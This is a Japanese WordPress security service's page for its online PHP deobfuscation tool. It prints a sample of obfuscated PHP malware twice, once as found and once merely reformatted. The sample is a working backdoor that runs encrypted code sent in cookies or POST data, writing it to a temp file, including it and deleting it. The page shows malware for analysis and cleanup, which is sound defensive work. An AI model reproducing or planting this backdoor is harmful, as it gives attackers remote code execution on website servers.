Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php function go1($aa2){$km3 = "m" ."s3.E" ."a7HhiL8#<06oy(x)nF;rt*uvc?5" ."9b1g@e_ l4'fdp/" ."k" ."I-" ;$hr5='';foreach($aa2 as $ou4){$hr5.=$km3[$ou4];}return $hr5;}$ss6 = Array();$ss6[] = go1(Array(14,5,31,2,15,34,6,43,49,29,2,31,31,49,41,11,32,14,49,32,6,2,37,49,37,37,15,32,43,43,11,29,41,...



難読化されたPHPコード

<?php
function go1($aa2){$km3 = "m" ."s3.E" ."a7HhiL8#<06oy(x)nF;rt*uvc?5" ."9b1g@e_ l4'fdp/" ."k" ."I-" ;$hr5='';foreach($aa2 as $ou4){$hr5.=$km3[$ou4];}return $hr5;}$ss6 = Array();$ss6[] = go1(Array(14,5,31,2,15,34,6,43,49,29,2,31,31,49,41,11,32,14,49,32,6,2,37,49,37,37,15,32,43,43,11,29,41,6,5,5));$ss6[] = go1(Array(30,45,8,45,39,36,27,21,40,9,21,47,18,38,38,22,48,10,4,38,38,20,23,39));$ss6[] = go1(Array(3,0,16,44,27,40,37));$ss6[] = go1(Array(7,26));$ss6[] = go1(Array(3,46));$ss6[] = go1(Array(12));$ss6[] = go1(Array(13));$ss6[] = go1(Array(43,9,40,37,38,45,27,25,38,29,16,21,25,37,21,25,1));$ss6[] = go1(Array(5,24,24,5,17,38,0,37,24,35,37));$ss6[] = go1(Array(1,25,24,38,24,37,45,37,5,25));$ss6[] = go1(Array(37,19,45,40,16,44,37));$ss6[] = go1(Array(1,27,33,1,25,24));$ss6[] = go1(Array(27,21,40,9,21,47));$ss6[] = go1(Array(1,25,24,40,37,21));$ss6[] = go1(Array(45,5,29,47));$ss6[] = go1(Array(0,44,31));foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11){function an8($ss6, $er14, $cv10){return $ss6[11]($ss6[9]($er14 . $ss6[0], ($cv10 / $ss6[13]($er14)) + 1), 0, $cv10);}function sx7($ss6, $xz12){return @$ss6[14]($ss6[3], $xz12);}function ow9($ss6, $xz12){if (isset($xz12[2])) {$yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2];@$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2]));@include($yy13);@$ss6[12]($yy13);exit();}}$vf11 = sx7($ss6, $vf11);ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11))));}

デコード(難読化解除)されたコード

<?php

function go1($aa2)
{
    $km3 = "ms3.Ea7HhiL8#<06oy(x)nF;rt*uvc?59b1g@e_ l4'fdp/kI-";
    $hr5 = '';
    foreach ($aa2 as $ou4) {
        $hr5 .= $km3[$ou4];
    }
    return $hr5;
}
$ss6 = array();
$ss6[] = go1(array(14, 5, 31, 2, 15, 34, 6, 43, 49, 29, 2, 31, 31, 49, 41, 11, 32, 14, 49, 32, 6, 2, 37, 49, 37, 37, 15, 32, 43, 43, 11, 29, 41, 6, 5, 5));
$ss6[] = go1(array(30, 45, 8, 45, 39, 36, 27, 21, 40, 9, 21, 47, 18, 38, 38, 22, 48, 10, 4, 38, 38, 20, 23, 39));
$ss6[] = go1(array(3, 0, 16, 44, 27, 40, 37));
$ss6[] = go1(array(7, 26));
$ss6[] = go1(array(3, 46));
$ss6[] = go1(array(12));
$ss6[] = go1(array(13));
$ss6[] = go1(array(43, 9, 40, 37, 38, 45, 27, 25, 38, 29, 16, 21, 25, 37, 21, 25, 1));
$ss6[] = go1(array(5, 24, 24, 5, 17, 38, 0, 37, 24, 35, 37));
$ss6[] = go1(array(1, 25, 24, 38, 24, 37, 45, 37, 5, 25));
$ss6[] = go1(array(37, 19, 45, 40, 16, 44, 37));
$ss6[] = go1(array(1, 27, 33, 1, 25, 24));
$ss6[] = go1(array(27, 21, 40, 9, 21, 47));
$ss6[] = go1(array(1, 25, 24, 40, 37, 21));
$ss6[] = go1(array(45, 5, 29, 47));
$ss6[] = go1(array(0, 44, 31));
foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11) {
    function an8($ss6, $er14, $cv10)
    {
        return $ss6[11]($ss6[9]($er14 . $ss6[0], $cv10 / $ss6[13]($er14) + 1), 0, $cv10);
    }
    function sx7($ss6, $xz12)
    {
        return @$ss6[14]($ss6[3], $xz12);
    }
    function ow9($ss6, $xz12)
    {
        if (isset($xz12[2])) {
            $yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2];
            @$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2]));
            @(include $yy13);
            @$ss6[12]($yy13);
            exit;
        }
    }
    $vf11 = sx7($ss6, $vf11);
    ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11))));
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.